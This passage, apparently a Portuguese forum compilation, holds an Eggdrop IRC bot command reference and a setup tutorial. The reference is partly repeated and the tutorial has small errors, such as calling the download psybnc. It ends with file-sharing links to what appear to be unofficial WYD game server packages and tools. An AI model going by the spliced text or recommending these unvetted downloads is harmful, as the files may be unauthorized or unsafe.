.chattr nick -d: Retira um usuário com a flag +d no bot(auto deop).
.chattr nick +m: Bota um usuário com a flag +m no bot(master).
.chattr nick -m: Retira um usuário com a flag +m no bot(master).
.chattr nick +n: Bota um usuário com a flag +n no bot(owner).
.chattr nick -n: Retira um usuário com a flag +n no bot(owner).
Chattr(no canal)
.chattr nick +ofp #canal: Bota um usuário com as flags +ofp no canal.
.chattr nick +o #canal: Bota um usuário com a flag +o no canal.
.chattr nick -o #canal: Retira um usuário com a flag +o no canal.
.chattr nick +f #canal: Bota um usuário com a flag +f no canal.
.chattr nick -f #canal: Retira um usuário com a flag +f no canal.
.chattr nick +p #canal: Bota um usuário com a flag +p no canal(acesso
a party-line).
.chattr nick -p #canal: Retire um usuário com a flag +p no
canal(acesso a party-line).
.chattr nick +d #canal: Bota um usuário com a flag +d no canal(auto deop).
.chattr nick -d #canal: Retira um usuário com a flag +d no canal(auto deop).
.chattr nick +m #canal: Bota um usuário com a flag +m no canal(master).
.chattr nick -m #canal: Retira um usuário com a flag +m no canal(master).
.chattr nick +n #canal: Bota um usuário com a flag +n no canal(owner).
.chattr nick -n #canal: Retira um usuário com a flag +n no canal(owner).
FLAGS
owner: n
master: m
operador: o
amigo: f
Alguém que tem acesso aos comandos referentes a botnet: t
Alguém que tem acesso a área de transferência de arquivos do bot (se
ela existir) e pode mandar e receber arquivos de/para o bot: x
Alguém que pode fazer a manutenção da área de arquivos (se ela
existir), como um "master" da área de arquivos: j
Identifica um usuário que na verdade é apenas um site público de irc,
de onde muitas pessoas podem acessar o irc, fazendo a máscara ser
irrelevante: c
Marca algum usuário como sendo um bot: b
Registro do usuário não pode ser mandado para outros bots: u
Alguém que não pode nunca ser op no canal: d
Alguém que deve ser chutado se entrar no canal: k
Alguém que deve ganhar op automaticamente ao entrar no canal mesmo se
o canal não estiver em +autoop (muito cuidado que isso pode ser um
risco de segurança): a
Alguém que deve ganhar voice (+ ao lado do nick) automaticamente ao
entrar no canal: v
Não permite voice para esta pessoa num canal com +autovoice ativado: q
OBS: Lembrando que tem um '.' (ponto) no começo dos comandos.
# ---------------------------------------------------------------
# COMANDOS FORA DA Party-line (VIA MSG)
#----------------------------------------------------------------
Para todos usuarios do bot
/msg Bot ADDHOST senha mascara Acrescenta uma nova máscara (host) as
que já estão registradas no bot para você
/msg Bot IDENT senha [nick] Faz o bot acrescentar automaticamente ao
seu registro o host que você está usando no momento.
/msg Bot INFO senha [canal] texto Acrescenta um pequeno texto que será
mandado ao canal toda vez que você entrar no canal (se este recurso
estiver ativado).
/msg Bot HELP [comando] Manda o texto de ajuda relacionado a este comando.
/msg Bot PASS senha Define sua senha, para que você possa outros
comandos como ident e poder mandar um DCC para o bot
/msg Bot VOICE senha [canal] Pede ao bot voice (aquele + ao lado do nick)
/msg Bot WHO canal Diz quem está no canal no momento e seus texto de
info, se houverem.
/msg Bot WHOIS nick Fornece alguns dados básicos sobre o nick,
incluindo quando ele foi visto pela última vez
Para os Operadores
/msg Bot GO canal Faz o bot sair do canal e voltar se ele não estiver
com op. Útil quando o canal fica sem ops.
/msg Bot INVITE canal senha Pede ao bot para lhe mandar um invite para
um canal. Muito útil se o canal estiver com +i.
/msg Bot KEY senha canal Faz o bot lhe dizer qual a senha de um canal
se ele estiver +k e o bot estiver no canal.
/msg Bot OP senha [canal] Pede ao bot para dar op
Para os Masters
/msg Bot die senha Faz o bot "morrer", ou seja, parar de funcionar.
/msg Bot JUMP senha [servidor porta senha_no_servidor] Faz o bot
trocar de servidor. Se você não disser o servidor ele pega o próximo
da lista dele de servidores.
/msg Bot MEMORY Mostra quanta memória o bot está usando
/msg Bot REHASH senha Faz o bot carregar de novo o arquivo de configuração
/msg Bot RESET [canal] Faz o bot resetar as informações dele sobre o
canal, útil apenas se o bot parece estar com informações
desencontradas.
/msg Bot STATUS Mostra informações básicas sobre o bot. Um status bem
mais completo pode ser obtido na party line.
Duvidas:
www.egghelp.org
_________________
By XKN @ -= ProxysX GrouP =-
# TUTO Rodando EGGDROP na shell
#----------------------------------------------------------------
1) Conecte-se à shell usando um programa como putty.exe (abaixeo em
www.superdownloads.com.br), Execute o
programa, nele ponha o ip-da-shell, porta, Protocolo da shell e mande
conectar, agora ponha o user e password,
Dentro da shell baixe a psybnc, digitando:
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19.tar.gz
(vc pode encontrar mais links de eggdrop nesse site = http://www.egghelp.org/files.htm)
[root@ns xkn]# wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19. tar.gz
--16:00:47-- ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19.tar.gz
=> `eggdrop1.6.19.tar.gz'
Resolviendo ftp.eggheads.org... hecho.
Conectando con ftp.eggheads.org[208.68.107.168]:21... conectado.
Identificándose como anonymous ... ¡Dentro!
==> SYST ... hecho. ==> PWD ... hecho.
==> TYPE I ... hecho. ==> CWD /pub/eggdrop/source/1.6 ... hecho.
==> PORT ... hecho. ==> RETR eggdrop1.6.19.tar.gz ... hecho.
Longitud: 1,033,152 (probablemente)
100%[====================================>] 1,033,152 43.99K/s ETA 00:00
16:01:13 (43.99 KB/s) - `eggdrop1.6.19.tar.gz' guardado [1033152]
apois fazer o download, vamos discompactar:
Verifique como o arquivo foi abaixado na shell:
ls
[root@ns xkn]# ls
eggdrop1.6.19.tar
nesse caso vc vai descompactar assim:
tar -xvf eggdrop1.6.19.tar
eggdrop1.6.19/src/mod/assoc.mod/language/
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.french.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.finnish.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.german.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.english.lang
eggdrop1.6.19/src/mod/assoc.mod/language/assoc.danish.lang
eggdrop1.6.19/src/mod/assoc.mod/assoc.h
eggdrop1.6.19/src/mod/assoc.mod/modinfo
eggdrop1.6.19/src/mod/seen.mod/
eggdrop1.6.19/src/mod/seen.mod/Makefile
eggdrop1.6.19/src/mod/seen.mod/help/
eggdrop1.6.19/src/mod/seen.mod/help/seen.help
eggdrop1.6.19/src/mod/seen.mod/help/msg/
eggdrop1.6.19/src/mod/seen.mod/help/msg/seen.help
eggdrop1.6.19/src/mod/seen.mod/seen.c
eggdrop1.6.19/src/mod/seen.mod/modinfo
eggdrop1.6.19/src/mod/filesys.mod/
ggdrop1.6.19/src/modules.h
eggdrop1.6.19/src/stat.h
eggdrop1.6.19/src/misc_file.c
eggdrop1.6.19/CONTENTS
eggdrop1.6.19/text/
eggdrop1.6.19/text/banner
eggdrop1.6.19/text/motd.finnish
eggdrop1.6.19/text/motd
eggdrop1.6.19/text/CONTENTS
eggdrop1.6.19/configure
eggdrop1.6.19/disabled_modules
eggdrop1.6.19/logs/
eggdrop1.6.19/logs/CONTENTS
eggdrop1.6.19/Makefile.in
eggdrop1.6.19/language/
eggdrop1.6.19/language/core.finnish.lang
eggdrop1.6.19/language/core.english.lang
eggdrop1.6.19/language/core.french.lang
eggdrop1.6.19/language/core.german.lang
eggdrop1.6.19/language/core.danish.lang
Apois decompactar entre na pasta que foi criada
[root@ns xkn]# ls
eggdrop1.6.19 eggdrop1.6.19.tar
cd eggdrop1.6.19
[root@ns xkn]# cd eggdrop1.6.19
[root@ns eggdrop1.6.19]#
então faxa esse comando:
./configure
Agora nois precisamos da .conf, vc deve abaixar ela da maquina e editar e fazer upload novamente para dentro da pasta eggdrop1.6.19...
o nome do arquivo é eggdrop.conf
[root@ns eggdrop1.6.19]# ls
CONTENTS Makefile.in configure.ac logs
COPYING NEWS disabled_modules misc
ChangeLog README doc scripts
FEATURES aclocal.m4 eggdrop.conf src
INSTALL config.h.in help text
Makefile configure language
Use o ftp para isso, caso vc não consigar acessar a shell por ftp, vc pode abaixar o eggdrop.conf nesses links:
Arquivo Original para verção mais nova:
http://www.freewebs.com/protonyc/eggdrop.conf
Arquivos editados:
http://www.freewebs.com/protonyc/Conf_para_eggdrop.txt
http://www.mateus07.xpg.com.br/eggdrop_exemplo.conf
depois configure o arquivo eggdrop.conf usando o bloco de notas, salve com outro nome, ponha o nome do bot no arquivo assim por exemplo BotXkN.conf e hospede ele num site free, tipo rapidshare, e faça denovo o download do msm para dentro da shell, dentro da pasta eggdrop1.6.19...
agora vc vai execultar o arquivo ferente a conf:
./eggdrop -m BitXkN.conf
depois para votar o bot so fazer ./eggdrop BitXkN.conf
pronto, so esperar que o eggdrop vai entrar na rede e canis que vc configurou na .conf ... depois basta interagir com ele usando o login e senha admin que vc configurou na .conf ... abrir dcc chat pronto
# ---------------------------------------------------------------
# TUTO EGGDROP
#----------------------------------------------------------------
Esse tutorial pertence: PROXYSX
AGORA VC IRA CONFIGURAR PASSO A PASSO SEU BOT, NESSE TUTORIAL TEM TDS
OS RECUSOS NECESSARIOS PARA ISSO E MAIS UM POUKO
LEIA ATENTAMENTE O TUTORIAL TODO PRIMEIRO ANTES DE TENTALO EXEKUTALO.
A UNIKA KOIZA K FOLTA NESSE TUTORIAL É A CONFIGURAXAUM DA .conf, KE EM
BREVE IREI POSTAR.
ESSE TUTORIAL FOI TESTADO E CRIADO EM BASE DO eggdrop1.6.1 e eggdrop1.6.17.
O que é um eggdrop?
Um eggdrop é um bot de IRC, escrito em C. Se você não sabe o que é
IRC, isto não é o que você está precisando! Um eggdrop é um bot que
fica num canal e tomar medidas preventivas para: evitar que o canal
seja tomado (as poucas medidas que qualquer coisa pode fazer),
reconhecer usuários ou endereços banidos e os expulsar, reconhecer
usuários especiais e lhes dar op, etc.
Um dos recursos exclusivos do eggdrop é sua "party line", acessível
via DCC Chat, que lhe permite falar com outras pessoas sem lag.
Considere-a um DCC chat múltiplo ou uma miniatura de IRC (inclusive
com canais). Você conectar com outros bots e expandir a party line até
ela se tornar algo próximo ao IRC.
O eggdrop está sendo sempre aprimorado e ajustado porque seu autor
nunca está realmente satisfeito com ele. De fato, ele existiu por
alguns anos com versões de 0.7 a 0.9 até que finalmente se tornou o
1.0. Um grande esforço foi feito para detectar e remover bugs.
Problemas devem ser raros.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ---------------------------------------------------------------
# CONFIGURANDO O BOT PELA PRIMEIRA VEZ
#----------------------------------------------------------------
Bem, a forma de configurar o bot varia de verxão pra verxão, a forma k
irei mostrar agora é a mais correta para
a maioria dos bots, cazo note algu de estranhu durante a configuraxaum
do seu bot, pare e refaxa os passos, se percistir o
error prokure outru tutorial diferente desse k configure seu bot kom
essatidaum, erros durente a configuraxaum vaum kauzar
probleminhas e maul funcionamento do bot.
CONFIGURAXAUM NA SHELL:
Antes de rodar o bot na shell vc preciza do Tcl ( um script de
interpretaxaum para bot, ele determina a linguagem dos comandos )
na maioria dos sistemas ja vem com ele pre instalados, você pode
checar digitando o comando:
tclsh
Se funcionar, você receberá um prompt '%', digite:
exit
para sair do programa, se acazo isso naum aparecer o prompt vc devera
que abaixo lo tente o site:
ftp://ftp.eggheads.org/pub/tcl
ABAIXAINDO O BOT:
- para abaixar o bot para shell precizara de um link, tente esse
abaixo, se naum funcionar pergunte no knal PROXYSX :
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.17.tar.gz
- Voce precisa extrair os arquivos do EggDrop para um diretório.
Digite o comando:
tar -xvzf eggdrop1.6.17.tar.gz
Obs.: Aguarde enquanto o Computador extraia todos os arquivos.
- Será criado um diretório chamado eggdrop1.6.17 no diretório corrente.
Agora, precisa de entrar dentro dele.
Digite o comando:
cd eggdrop1.6.17
- Agora, você está dentro do Diretório do EggDrop. A partir desse
momento, voce comeca a compilaçao do
EggDrop propriamente dita. Para isso, digite:
./configure
Obs.: Aguarde enquanto ele faz a configuraçao inicial.
- Agora voce tem que fazer a configuraçao, irá aparecer para voce:
"Type 'make config' to configure the modules, or type 'make iconfig'
to interactively choose which modules to compile."
Entao, como o Programa te retornou, digite:
make config
- Aguarde até terminar e quando voltar para a shell e digite:
make
- Vai aparecer a mensagem "Now run "make install" to install your
bot.", entao, digite:
make install
- Irá aparecer a mensagem:
"Installation completed.
You MUST ensure that you edit/verify your configuration file.
An example configuration file, eggdrop.conf, is distributed with Eggdrop.
Remember to change directory to /home/popsoft/eggdrop before you proceed."
Obs.: Está instalado corretamente o EggDrop. =)
- Voce precisa agora ir para o diretório correto, no caso eggdrop. Entao digite:
cd ..
cd eggdrop
Apois abaixar o bot na shell, deskompaktalo, va para a pasta do bot (
exemplo eggdrop1.6.1 e eggdrop1.6.17 ) e faxa:
./configure
make config
make
make install
Isso criará o diretorio "eggdrop" que é para onde as .conf deverão ser enviadas.
CONFIGURAXAUM DA .conf :
Bem eu fiz uma .conf aki, mas esta kom alguns erros, irei korrijilos e
postar, se vc naum sabe configurar uma .conf va
ate o google e prokure (afinal esse tutorial naum é pra amadores)
PS --> lembrese que logu a pois de configurar a .conf copie ela para o
diretorio "eggdrop".
RODANDO O BOT:
Com a .conf no diretorio "eggdrop" , Agora vc rodara o bot na shell ou
rodar a .conf no bot, dijitando
./eggdrop -m eggdrop.conf
Se a shell cair ou o bot, basta digitar para ele voltar ( esse comando
serve kuandu o bot kai e sisma naum voltar):
./eggdrop eggdrop.conf (não é necessario o -m)
Motivo para não botar o -m novamente:
Quando você for rodar o Eggdrop pela primeira vez, o eggdrop criará os
arquivos .chn e .usr, nesses arquivos serão
gravados os canais e os users cadastrados no Bot.
--> PS IMPORTANTE :
bem o nome da .conf é referente o nick do bot, pois naum pode haver 2
.conf do msm nome, para ajudar vc se
organivar renomeie a .conf reverente o nick do bot exemplo: nick do
bot: "XKN-BOT", nome da .conf: xknbot.conf.
sakou!! bem simples
CONTINUANDO:
Para evitar que vc tenha k voltar toda vez que seu bot kaia ou seja
reniciado, ou a shell cai e volte vc tem k por
um crontab no bot assim:
Copie de dentro da pasta "scripts" que está dentro da pasta "eggdrop"
o arquivo: autobotchk e bote na pasta eggdrop. Digite:
chmod +x autobotchk
./autobotchk eggdrop.conf -15 noemail-
CONECTANDO O BOT NO IRC:
Assim qu vc rodar o bot na shell ele ira conectar sozim no irc devidu
as configuraxaos do .conf,
kuando o bot entrar no irc digite:
/msg NICK_DO_BOT hello
Em seguida digite:
/msg NICK_DO_BOT pass UMA_SENHA
Isso configura uma senha pro bot, naum exkexa ela, vc tera k ultilizara ela.
Agora entre na Party-line, onde vc ira accessar o bot para isso mande
um dcc chat para o bot:
/dcc chat NICK_DO_BOT
Quando o bot receber o dcc chat, vai pedir a senha que você setou,
digite-a e você entrará na Party-line do bot.
# ---------------------------------------------------------------
# COMANDOS DA Party-line (VIA DCC CHAT)
#----------------------------------------------------------------
Controle do canal
.kick nick motivo: Kicka alguém do canal.
.kickban nick motivo: Kicka e banir alguém do canal.
.op nick #canal: Da Op a alguém.
.deop nick #canal: Tira Op de alguém.
.voice nick: Da Voice a alguém.
.devoice nick: Tira Voice de alguém.
.bans: Ver os bans atuais do bot.
.bans all: Ver todos os bans.
.resetbans: Remover todos os bans do canal.
.+ban mascara pro ban(ex.: *!*fulano@*.provedor.com.br): Adiciona um
ban permanente.
.-ban numero do ban: Remover um ban permanente.
.topic #canal topic: Troca o tópico de um canal.
.mode modos: Troca os modos de um canal.
Users
.adduser nick: Adicionar um novo user.
.-user nick: Retirar um user do bot.
.+host nick host: Adiciona um host.
.-host nick host: Remove um host.
.chattr +(-) flag nick: Adicionar users avançados.
Notes
.note nick mensagem: Escrever um note para alguem.
.notes read numero da nota: Ler um note.
.notes read: Ler todas as notes.
.notes erase numero da note: Apaga uma note.
.notes erase: Apaga todas as notes.
.note index: Listar notes.
.banner mensagem para enviar: Banner.
Senhas
.newpass nova senha: Mudar sua senha.
.chpass nick senha: Mudar senha de use.
.checkpass: Encontrar users sem pass.
Área de arquivos
.files: Entrar na área de arquivos.
quit: Sair da área de arquivos.
ls: Lista arquivos.
get arquivo para pegar nick: Pegar arquivo.
Outras
.+chan #canal: Adicionar o bot em um canal.
.-chan #canal: Tirar o bot de um canal.
.who: Lista os usuarios na Party Line.
.whois nick: Mostra as informacoes de alguém.
.rehash: Recarrega o BOT.
.save: Salva tudo que você fez no bot.
.stats: Para ver a estatistica no canal na pl.
.jump: server Muda o server do bot.
.die msg: Kila o bot deixando uma msg. Desconecta o bot.
.addlog texto: Acrescenta um texto ao log. Pode ser útil se alguém for
ler o log depois.
.away texto: Marca você como away na party line. Para deixar de estar
marcado como away digite .back ou .away
.botinfo: Mostra os dados dos bots que estão conectados à botnet.
.bots: Mostra os bots conectados a este através de uma botnet.
.bottree: Mostra os bots na botnet e como eles estão conectados
.chat canal: Muda o canal interno do bot em que você está. .chat off
lhe retira de todos os canais internos do bot, mas sem perder conexão
ao bot.
.console #canal modos: Muda as opções do seu console. Apenas .console
mostra o console atual. Os masters podem mudar o console de outro
usuário com .console usuário #canal modos. Os modos possíveis são:
m - Mostra as mensagens e ctps para o bot
p - Mostra o texto do canal
k - Mostra os kicks, bans e mudanças de modos do canal
j - Mostra os joins, part, mudança de nick, quit, etc do canal
b - Mostra a atividade de bots linkando ou deslinkando e
compartilhando usuários
s - Mostra as mensagens do servidor de IRC como servidores
conectando e netsplits.
w - Mostra os wallops dos ircops da rede
Apenas para masters de canal:
c - Mostra os comandos mandados pelos usuários
o - Mostra os outros tipos de mensagens
Apenas para masters:
x - Mensagens referentes a parte de transferência de arquivos
d - Mensagens de debug, que interessam apenas aos programadores
Apenas para owners:
r - Mostra todas as mensagens recebidas do servidor
v - Mostra todas as mensagens mandadas para o servidor
.echo on|off: Liga ou desliga o echo, ou seja, a repetição de todo
texto que você manda para a partyline.
.fixcodes: Troca o tipo de conexão de telnet para DCC e vice-versa
para quando o bot interpreta errado o tipo de conexão.
.match flags #canal começo fim
ou
.match texto começo fim: Mostra a lista de usuários que tem certo
acesso ou que encaixam em certo texto. Por exemplo: .match +m: mostra
todos os masters. Como este comando mostra apenas 20 usuários de cada
vez você deve usar os paramêtros de começo e fim para ver o resto. Por
exemplo: .match *.br 61 70
.me texto: Equivalente ao /me dos clientes de IRC, só que manda para a
partyline.
.motd: Mostra aquela mensagem que você vê quando conecta ao bot
.nick novo_nick: Muda o nick (handle) pelo qual o bot lhe conhece.
.note nick[@bot]: texto Manda uma nota para algum outro usuário do bot
.newpass senha: Troca sua senha no bot
.page numero|off: Muda o número de linhas que o bot lhe manda de cada
vez. Inútil em casos em que você pode rolar a tela como nos clientes
de IRC atual.
.quit [comentário]: Desconecta do bot.
.strip modos: Remove ou recoloca (-modo ou +modo) um dos modos de
texto, os modos possíveis são: b (negrito), r (video inverso), u
(sublinhado), a (códigos ansi), g (código bell). Isto é útil apenas se
você tem um cliente de IRC muito antigo e defasado.
.su usuario [senha]: Muda o usuário com que você está logado no bot.
Se você for o owner pode mudar para qualquer outro, caso contrário
precisa da senha. Útil para um recurso de segurança que é sempre logar
no bot como usuário comum e só se tornar owner quando for necessário e
depois de ter certeza que é o bot certo.
.trace bot: Mostra o caminho até outro bot da mesma botnet
.who [bot]: Mostra os usuários conectados ao bot e seus dados básicos
.whois nick: Mostra os dados de um usuário. Para mais explicações
sobre as flags.
.whom #canal: Mostra os usuários na partyline conjunta do bot, que
pode incluir usuários em outros bots se o bot estiver numa botnet
Comandos via dcc para masters de botnets
.boot nick[@bot]: Chuta alguém da partyline. O owner do bot não pode
ser chutado.
.+bot bot endereço:porta [máscara]: Adiciona um registro para um novo
bot na botnet
.-bot bot :Retira o registro de um bot
.chaddr bot endereço:porta: Muda o endereço de um bot
.chattr nick flags canal: Muda as flags de um usuário. Um owner
permanente (definido no arquivo de configuração do bot) não pode ser
removido. Exemplo: .chattr nick +o #teste. Digitar apenas o nick, sem
flags, mostra as flags atuais do usuário.
.chnick nick_velho nick_novo: Muda o nick (handle) pelo qual o bot
conhece o usuário
.chpass nick nova_senha: Muda a senha de alguém
.+host nick máscara: Acrescenta uma máscara (host) ao registro de alguém.
.-host nick máscara: Retira uma máscara (host) do registro de alguém.
.link bot1 [bot2]: Manda o bot1 se ligar ao bot2, se você digitar
apenas um bot seu bot tentará se conectar a ele.
.relay bot: Faz sua conexão ser passada para outro bot, ou seja,
funciona como se você conectasse ao outro bot.
.unlink bot: Desconecta um bot. Atenção: .unlink * desconecta o seu
bot da botnet.
Comandos via DCC para Masters do BOT
.banner texto: Manda uma mensagem para todas as pessoas conectadas no
bot naquele momento.
.binds [tipo] [all]: Mostra os binds, ou seja, comandos que ativam o
bot. O tipo pode ser dcc, msg, etc. Se você digitar all ele mostra
também os binds que ativam os comandos internos do eggdrop.
.chattr nick flags #canal: Muda as flags de um usuário. Um owner
permanente (definido no arquivo de configuração do bot) não pode ser
removido. Exemplo: .chattr nick +o #teste. Digitar apenas o nick, sem
flags, mostra as flags atuais do usuário.
.comment nick texto: Acrescenta um comentário ao registro do usuário,
este comentário só pode ser vistos por masters e usando os comandos
match ou whois.
.dccstat: Mostra todas as conexões atuais do bot.
.debug: Mostra os detalhes da ocupação de memória do bot se ele tiver
sido compilado para permitir isso. Útil apenas para programadores
experientes.
.+ignore máscara comentário: Faz o bot ignorar uma pessoa até que
outro master retire a máscara da lista de ignores.
.-ignore máscara|número: Retira um ignore.
.ignores [máscara]: Mostra as máscaras atualmente na lista de ignore
do bot e informações básicas sobre estes ignores.
.save: Faz o bot salvar os dados de usuários e canais. Normalmente o
bot já faz isto automaticamente uma vez por hora.
.rehash: Salva os arquivos de usuários e canais e depois carrega todos
os arquivos novamente, inclusive o arquivo de configuração. Útil para
acrescentar ou modificar tcls e configurações sem fazer o bot sair do
canal.
.reload: Recarrega o arquivo de usuários diretamente do disco,
esquecendo os dados na memória no momento. Cuidado que este comando
pode fazer o bot perder dados relativos a usuários.
.restart: Descarrega tudo da memória e reinicializa o bot. Cuidado que
este comando faz o bot desconectar do servidor de IRC.
.status [all]: Mostra uma série de dados sobre o bot, se você
acrescentar all verá ainda mais dados. Veja a ajuda interna do eggdrop
para mais detalhes.
.+user nick máscara: Acrescenta um usuário com a máscara dada.
.-user nick: Retira o registro de um usuário
Comandos via DCC para Owners
.die [razão]: Faz o bot morrer, ou seja, desconectar e parar de rodar.
.loadmod modúlo: Carrega um módulo, trecho de programação que pode ser
acrescentado ao eggdrop padrão. Não confunda com scripts em tcl que
não precisam deste comando.
.module [módulo]: Mostra a lista de módulos ou um módulo específico de
seu bot e algumas informações sobre cada um.
.modules bot: Mostra os módulos carregados em outro bot da botnet.
.rehelp: Faz o bot atualizar seus arquivos de ajuda interna.
.set variável [valor]: Mostra o valor de uma variável interna do bot
ou, se for dado um valor, muda o valor da variável. A lista de
variáveis pode ser vista com .help set.
.simul nick texto: Faz parecer que o nick digitou o texto que você
quiser, inclusive comandos. Este comando pode ser desabilitado na
configuração do bot. Cuidado com este comando.
.tcl comando: Comando para mandar comandos ao bot como se fosse um
script tcl. Pode ser desabilitado na configuração e é muito perigoso,
pois o menor erro pode trazer problemas para o bot.
.unloadmod módulo: Descarrega um módulo da memória do computador.
Chattr(no bot)
.chattr nick +ofp: Bota um usuário com as flags +ofp no bot.
.chattr nick +o: Bota um usuário com a flag +o no bot.
.chattr nick -o: Retira um usuário com a flag +o no bot.
.chattr nick +f: Bota um usuário com a flag +f no bot.
.chattr nick -f: Retira um usuário com a flag +f no bot.
.chattr nick +p: Bota um usuário com a flag +p no bot(acesso a party-line).
.chattr nick -p: Retire um usuário com a flag +p no bot(acesso a party-line).
.chattr nick +d: Bota um usuário com a flag +d no bot(auto deop).
.chattr nick -d: Retira um usuário com a flag +d no bot(auto deop).
.chattr nick +m: Bota um usuário com a flag +m no bot(master).
.chattr nick -m: Retira um usuário com a flag +m no bot(master).
.chattr nick +n: Bota um usuário com a flag +n no bot(owner).
.chattr nick -n: Retira um usuário com a flag +n no bot(owner).
Chattr(no canal)
.chattr nick +ofp #canal: Bota um usuário com as flags +ofp no canal.
.chattr nick +o #canal: Bota um usuário com a flag +o no canal.
.chattr nick -o #canal: Retira um usuário com a flag +o no canal.
.chattr nick +f #canal: Bota um usuário com a flag +f no canal.
.chattr nick -f #canal: Retira um usuário com a flag +f no canal.
.chattr nick +p #canal: Bota um usuário com a flag +p no canal(acesso
a party-line).
.chattr nick -p #canal: Retire um usuário com a flag +p no
canal(acesso a party-line).
.chattr nick +d #canal: Bota um usuário com a flag +d no canal(auto deop).
.chattr nick -d #canal: Retira um usuário com a flag +d no canal(auto deop).
.chattr nick +m #canal: Bota um usuário com a flag +m no canal(master).
.chattr nick -m #canal: Retira um usuário com a flag +m no canal(master).
.chattr nick +n #canal: Bota um usuário com a flag +n no canal(owner).
.chattr nick -n #canal: Retira um usuário com a flag +n no canal(owner).
FLAGS
owner: n
master: m
operador: o
amigo: f
Alguém que tem acesso aos comandos referentes a botnet: t
Alguém que tem acesso a área de transferência de arquivos do bot (se
ela existir) e pode mandar e receber arquivos de/para o bot: x
Alguém que pode fazer a manutenção da área de arquivos (se ela
existir), como um "master" da área de arquivos: j
Identifica um usuário que na verdade é apenas um site público de irc,
de onde muitas pessoas podem acessar o irc, fazendo a máscara ser
irrelevante: c
Marca algum usuário como sendo um bot: b
Registro do usuário não pode ser mandado para outros bots: u
Alguém que não pode nunca ser op no canal: d
Alguém que deve ser chutado se entrar no canal: k
Alguém que deve ganhar op automaticamente ao entrar no canal mesmo se
o canal não estiver em +autoop (muito cuidado que isso pode ser um
risco de segurança): a
Alguém que deve ganhar voice (+ ao lado do nick) automaticamente ao
entrar no canal: v
Não permite voice para esta pessoa num canal com +autovoice ativado: q
OBS: Lembrando que tem um '.' (ponto) no começo dos comandos.
# ---------------------------------------------------------------
# COMANDOS FORA DA Party-line (VIA MSG)
#----------------------------------------------------------------
Para todos usuarios do bot
/msg Bot ADDHOST senha mascara Acrescenta uma nova máscara (host) as
que já estão registradas no bot para você
/msg Bot IDENT senha [nick] Faz o bot acrescentar automaticamente ao
seu registro o host que você está usando no momento.
/msg Bot INFO senha [canal] texto Acrescenta um pequeno texto que será
mandado ao canal toda vez que você entrar no canal (se este recurso
estiver ativado).
/msg Bot HELP [comando] Manda o texto de ajuda relacionado a este comando.
/msg Bot PASS senha Define sua senha, para que você possa outros
comandos como ident e poder mandar um DCC para o bot
/msg Bot VOICE senha [canal] Pede ao bot voice (aquele + ao lado do nick)
/msg Bot WHO canal Diz quem está no canal no momento e seus texto de
info, se houverem.
/msg Bot WHOIS nick Fornece alguns dados básicos sobre o nick,
incluindo quando ele foi visto pela última vez
Para os Operadores
/msg Bot GO canal Faz o bot sair do canal e voltar se ele não estiver
com op. Útil quando o canal fica sem ops.
/msg Bot INVITE canal senha Pede ao bot para lhe mandar um invite para
um canal. Muito útil se o canal estiver com +i.
/msg Bot KEY senha canal Faz o bot lhe dizer qual a senha de um canal
se ele estiver +k e o bot estiver no canal.
/msg Bot OP senha [canal] Pede ao bot para dar op
Para os Masters
/msg Bot die senha Faz o bot "morrer", ou seja, parar de funcionar.
/msg Bot JUMP senha [servidor porta senha_no_servidor] Faz o bot
trocar de servidor. Se você não disser o servidor ele pega o próximo
da lista dele de servidores.
/msg Bot MEMORY Mostra quanta memória o bot está usando
/msg Bot REHASH senha Faz o bot carregar de novo o arquivo de configuração
/msg Bot RESET [canal] Faz o bot resetar as informações dele sobre o
canal, útil apenas se o bot parece estar com informações
desencontradas.
/msg Bot STATUS Mostra informações básicas sobre o bot. Um status bem
mais completo pode ser obtido na party line.
Duvidas:
www.egghelp.org
_________________
By XKN @ -= ProxysX GrouP =-
TUTO = CRIANDO WYD Server
Donwloads necessários:
WYD Server:
Escolha um servergame
SERVERGAME 1 => http://www.4shared.com/account/file/64676828/10367438/Server_WYD_613.html,
==================================================
SERVERGAME 2 =>
SERVIDOR 6.13: http://www.4shared.com/file/88347147/a4f901e0/SVR.html
CLIENT WYD 6.13: http://rapidshare.de/files/38667842/Client_WYD_TEBAS.exe.html
NPKO: http://www.4shared.com/file/65286533/2991d1d1/NPKO_BR_-_By_Equipe_Armagedon.html
Cadastro + Mudar Senha para WebSites:http://www.4shared.com/file/65660607/65d5bf9/Cadastro__Mudar_Senha.html
==================================================
SERVERGAME 3 =>
WYD Server Release 2.0 e 2.1.
http://www.4shared.com/account/file/64680242/c15777b/release_20_e_21.html
=================================================
SERVERGAME 4 =>
[u]WYD Server 6.13.
http://www.4shared.com/account/file/64676828/10367438/Server_WYD_613.html
================================================
SERVERGAME 5 =>
[u]WYD Server 6.56.
http://www.4shared.com/account/file/64732701/e13e0b11/WYD-SERVER_6156.html
===============================================
ABRIR SV 7.52
http://xeongames.forumeiros.com/tutoriais-f13/tutorial-abrir-server-versao-752-t916.htm
CRIANDO NPC
http://xeongames.forumeiros.com/tutoriais-f13/tutorialcriando-npc-no-752-t922.htm
CRIANDO ARCH
http://xeongames.forumeiros.com/tutoriais-f13/criando-arch-t952.htm
WYD IP Changer:
http://www.4shared.com/account/file/64682007/b19e5a15/WYD_IP_Changer.html
Download do hamachi:
http://files.filefront.com/HamachiSetup+10061+enrar/;6288498;/fileinfo.html
http://www.4shared.com/account/file/64730356/af2d0aa0/HamachiSetup-1025-pt-br.html
Linguagen [desbugado] (english).
http://www.4shared.com/account/file/64827004/6ff3824c/Language.html
========================================================
Outros Links:
pasta BISRV completa download: http://lix.in/4bb7db ou http://rapidshare.com/files/5244749/BISRV.rar.html
DBSRV:ja esta com criador de ACC: http://lix.in/f1ec36 ou http://rapidshare.com/files/10275661/DBSRV.rar.html
TMSRV com arch e tudo mais menos 8 skill download: http://lix.in/5e4070 ou http://rapidshare.com/files/5245845/TMSRV.rar.html
esta com arch e meus npc pronto tudinho pronto menos a 8 skill
xD
